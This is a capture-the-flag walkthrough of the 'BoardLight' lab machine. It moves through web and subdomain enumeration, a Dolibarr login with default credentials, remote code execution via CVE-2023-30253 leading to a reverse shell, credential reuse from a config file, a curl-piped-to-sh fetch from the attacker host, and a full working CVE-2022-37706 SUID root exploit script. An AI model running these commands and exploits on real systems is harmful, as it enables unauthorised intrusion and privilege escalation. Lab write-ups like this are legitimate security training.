BoardLight

Recon

nmap_scan.log|h-50%

HTTP (80)

Pasted_image_20240527235805.png
┌──(woyag㉿kraken)-[~/Desktop/Rooms/BoardLight]
└─$ feroxbuster -u http://10.10.11.11/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -d 1 -x php

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.11.11/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 1
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        1l        3w       16c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        5l       23w     1217c http://10.10.11.11/images/location-white.png
200      GET        7l       48w     3995c http://10.10.11.11/images/d-5.png
200      GET      294l      633w     9209c http://10.10.11.11/do.php
200      GET        5l       48w     1493c http://10.10.11.11/images/fb.png
200      GET      280l      652w     9100c http://10.10.11.11/about.php
200      GET      517l     1053w    15949c http://10.10.11.11/
200      GET      294l      635w     9426c http://10.10.11.11/contact.php
301      GET        9l       28w      308c http://10.10.11.11/css => http://10.10.11.11/css/
301      GET        9l       28w      311c http://10.10.11.11/images => http://10.10.11.11/images/
301      GET        9l       28w      307c http://10.10.11.11/js => http://10.10.11.11/js/
[####################] - 22s     4761/4761    0s      found:10      errors:2737
[####################] - 21s     4728/4728    223/s   http://10.10.11.11/

Hmm.. nothing We do have email linked to board.htb, let's add it to hosts and try enumerate subdomains.

crm.board.htb

┌──(woyag㉿kraken)-[~/Desktop/Rooms/BoardLight]
└─$ domain="board.htb"; ffuf -u "http://$domain" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.$domain" -mc all -fl 518
       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://board.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.board.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
 :: Filter           : Response lines: 518
________________________________________________

crm                     [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 222ms]
:: Progress: [4989/4989] :: Job [1/1] :: 170 req/sec :: Duration: [0:00:29] :: Errors: 0 ::
Pasted_image_20240528000258.png

Searching for version we end up with CVE: https://www.swascan.com/security-advisory-dolibarr-17-0-0/

We are able to login with default credentials:

Creds: admin:admin

Pasted_image_20240528000734.png

RCE

CVE-2023-30253.py|h-50%

The fricking app was deleting my website in like 5 seconds so I just created a PoC script.

┌──(woyag㉿kraken)-[~/Desktop/Rooms/BoardLight]
└─$ py CVE-2023-30253.py
[+] Token: 2d11f087577b4e3739fa6229c4e6e38d
[+] Login Success!
[+] Website Created!
[+] Page Created!
[+] Payload Injected!
---
┌──(woyag㉿kraken)-[~/Desktop/Rooms/BoardLight]
└─$ pwncat -lp 4444
[17:37:15] Welcome to pwncat 🐈!                                                          __main__.py:164
[17:40:31] received connection from 10.10.11.11:36888                                          bind.py:84
[17:40:33] 10.10.11.11:36888: registered new host w/ db                                    manager.py:957
(local) pwncat$
(remote) www-data@boardlight:/var/www/html/crm.board.htb/htdocs/website$

Config

(remote) www-data@boardlight:/var/www/html/crm.board.htb/htdocs/conf$ cat conf.php | grep -v '//'
<?php
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
$dolibarr_main_authentication='dolibarr';

$dolibarr_main_prod='0';
$dolibarr_main_force_https='0';
$dolibarr_main_restrict_os_commands='mysqldump, mysql, pg_dump, pgrestore';
$dolibarr_nocsrfcheck='0';
$dolibarr_main_instance_unique_id='ef9a8f59524328e3c36894a9ff0562b5';
$dolibarr_mailing_limit_sendbyweb='0';
$dolibarr_mailing_limit_sendbycli='0';
(remote) www-data@boardlight:/var/www/html/crm.board.htb/htdocs/conf$ ls /home
larissa

SSH

We are able to ssh with database password.

Creds: larissa:serverfun2$2023!!

User.txt

larissa@boardlight:~$ cat user.txt
ac562f5e61623471ea40e49cbd04ba8b

Privilege Escalation

larissa@boardlight:/tmp/t$ curl 10.10.16.54/lp.sh | sh | tee lp.log
...
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-0847] DirtyPipe

   Details: https://dirtypipe.cm4all.com/
   Exposure: probable
   Tags: [ ubuntu=(20.04|21.04) ],debian=11
   Download URL: https://haxx.in/files/dirtypipez.c

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: probable
   Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded


╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
...
larissa@boardlight:/tmp/t$ curl 10.10.16.54/exploit_nss.py -Os
larissa@boardlight:/tmp/t$ python3 exploit_nss.py
Traceback (most recent call last):
  File "exploit_nss.py", line 220, in <module>
    assert check_is_vuln(), "target is patched"
AssertionError: target is patched

dirtypipe also failed to gain root.

If we take a look at suid binaries on system we see some odd files from enlightenment:

larissa@boardlight:/tmp$ find / -perm -4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/vmware-user-suid-wrapper

Root.txt

Quick google shows us known exploit: https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit

larissa@boardlight:/tmp$  echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."

file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
	echo "[-] Couldn't find the vulnerable SUID file..."
	echo "[*] Enlightenment should be installed on your system."
	exit 1
fi

echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net

mount: /dev/../tmp/: cant find in /etc/fstab.
## whoami
root
## cd /root
## ls
root.txt  snap
## cat root.txt
dcddc7a55c4749fbdb1e16b70660e295
PreviousBlurryNextEditorial

Last updated